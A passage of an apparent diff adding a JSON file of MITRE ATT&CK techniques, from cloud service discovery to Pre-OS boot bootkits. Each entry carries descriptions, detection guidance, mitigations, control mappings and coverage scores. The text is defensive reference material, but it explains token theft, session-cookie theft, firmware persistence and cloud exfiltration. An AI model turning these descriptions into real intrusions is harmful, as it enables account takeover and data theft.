Azure AD, etc. \n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)", + "url": "https://attack.mitre.org/techniques/T1526", + "tactics": [ + "Discovery" + ], + "detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.", + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Office 365", + "SaaS" + ], + "data_sources": [ + "Cloud Service: Cloud Service Enumeration", + "Cloud Service: Cloud Service Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.20607619047619047, + "adjusted_score": 0.20607619047619047, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1528", + "name": "Steal Application Access Token", + "description": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nAdversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)", + "url": "https://attack.mitre.org/techniques/T1528", + "tactics": [ + "Credential Access" + ], + "detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\n\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\n\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.", + "platforms": [ + "Azure AD", + "Google Workspace", + "Office 365", + "SaaS" + ], + "data_sources": [ + "User Account: User Account Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 0.7387666666666667, + "adjusted_score": 0.7387666666666667, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "2.3,2.5,3.3,4.1,4.7,5.3,5.4,14.1,14.2,14.3,14.6,18.3,18.5" + ], + "nist_controls": [ + "AC-10", + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "IA-2", + "IA-4", + "IA-5", + "IA-8", + "RA-5", + "SA-11", + "SA-15", + "SI-4" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1529", + "name": "System Shutdown/Reboot", + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)", + "url": "https://attack.mitre.org/techniques/T1529", + "tactics": [ + "Impact" + ], + "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Sensor Health: Host Status" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.12962857142857143, + "adjusted_score": 0.12962857142857143, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1530", + "name": "Data from Cloud Storage Object", + "description": "Adversaries may access data objects from improperly secured cloud storage.\n\nMany cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)\n\nMisconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.", + "url": "https://attack.mitre.org/techniques/T1530", + "tactics": [ + "Collection" + ], + "detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.", + "platforms": [ + "IaaS" + ], + "data_sources": [ + "Cloud Storage: Cloud Storage Access" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.775847619047619, + "adjusted_score": 0.775847619047619, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.11,3.3,4.1,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,6.8,11.3,13.4,18.2,18.3,18.5" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-18", + "AC-19", + "AC-2", + "AC-20", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "AC-7", + "CA-7", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-3", + "IA-4", + "IA-5", + "IA-6", + "IA-8", + "RA-5", + "SC-28", + "SC-4", + "SC-7", + "SI-10", + "SI-12", + "SI-15", + "SI-4", + "SI-7" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1531", + "name": "Account Access Removal", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n\nAdversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)", + "url": "https://attack.mitre.org/techniques/T1531", + "tactics": [ + "Impact" + ], + "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n\n* Event ID 4723 - An attempt was made to change an account's password\n* Event ID 4724 - An attempt was made to reset an account's password\n* Event ID 4726 - A user account was deleted\n* Event ID 4740 - A user account was locked out\n\nAlerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Active Directory: Active Directory Object Modification", + "User Account: User Account Deletion", + "User Account: User Account Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.15117619047619046, + "adjusted_score": 0.15117619047619046, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1534", + "name": "Internal Spearphishing", + "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)\n\nAdversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)", + "url": "https://attack.mitre.org/techniques/T1534", + "tactics": [ + "Lateral Movement" + ], + "detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)", + "platforms": [ + "Google Workspace", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.41880000000000006, + "adjusted_score": 0.41880000000000006, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1535", + "name": "Unused/Unsupported Cloud Regions", + "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)", + "url": "https://attack.mitre.org/techniques/T1535", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)", + "platforms": [ + "IaaS" + ], + "data_sources": [ + "Instance: Instance Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "cumulative_score": 0.21107619047619047, + "adjusted_score": 0.21107619047619047, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "4.1,18.3,18.5" + ], + "nist_controls": [ + "SC-23" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1537", + "name": "Transfer Data to Cloud Account", + "description": "Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) ", + "url": "https://attack.mitre.org/techniques/T1537", + "tactics": [ + "Exfiltration" + ], + "detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. ", + "platforms": [ + "IaaS" + ], + "data_sources": [ + "Cloud Storage: Cloud Storage Creation", + "Cloud Storage: Cloud Storage Modification", + "Snapshot: Snapshot Creation", + "Snapshot: Snapshot Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.6049333333333332, + "adjusted_score": 0.6049333333333332, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.3,4.2,4.4,4.7,5.3,6.1,6.2,6.8,13.4" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-2", + "AC-20", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "IA-3", + "IA-4", + "IA-8", + "SC-7", + "SI-10", + "SI-15", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1538", + "name": "Cloud Service Dashboard", + "description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.", + "url": "https://attack.mitre.org/techniques/T1538", + "tactics": [ + "Discovery" + ], + "detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)", + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Office 365" + ], + "data_sources": [ + "Logon Session: Logon Session Creation", + "User Account: User Account Authentication" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.26812380952380954, + "adjusted_score": 0.26812380952380954, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "3.3,4.7,5.3,5.4,6.1,6.2,6.8" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "IA-2", + "IA-8" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1539", + "name": "Steal Web Session Cookie", + "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.", + "url": "https://attack.mitre.org/techniques/T1539", + "tactics": [ + "Credential Access" + ], + "detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.", + "platforms": [ + "Google Workspace", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "File: File Access", + "Process: Process Access" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 0.6215523809523809, + "adjusted_score": 0.6215523809523809, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "4.1,6.3,14.1,14.2,14.3,14.6,18.3,18.5" + ], + "nist_controls": [ + "AC-20", + "AC-3", + "AC-6", + "CA-7", + "CM-2", + "CM-6", + "IA-2", + "IA-5", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1542", + "name": "Pre-OS Boot", + "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.", + "url": "https://attack.mitre.org/techniques/T1542", + "tactics": [ + "Defense Evasion", + "Persistence" + ], + "detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)", + "platforms": [ + "Linux", + "Network", + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Drive: Drive Modification", + "Driver: Driver Metadata", + "Firmware: Firmware Modification", + "Network Traffic: Network Connection Creation", + "Process: OS API Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1542.001", + "name": "Pre-OS Boot: System Firmware", + "url": "https://attack.mitre.org/techniques/T1542/001", + "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", + "detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1542.002", + "name": "Pre-OS Boot: Component Firmware", + "url": "https://attack.mitre.org/techniques/T1542/002", + "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", + "detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.", + "mitigations": [] + }, + { + "tid": "T1542.003", + "name": "Pre-OS Boot: Bootkit", + "url": "https://attack.mitre.org/techniques/T1542/003", + "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.", + "detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.", + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1542.004", + "name": "Pre-OS Boot: ROMMONkit", + "url": "https://attack.mitre.org/techniques/T1542/004", + "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.", + "detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1542.005", + "name": "Pre-OS Boot: TFTP Boot", + "url": "https://attack.mitre.org/techniques/T1542/005", + "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. 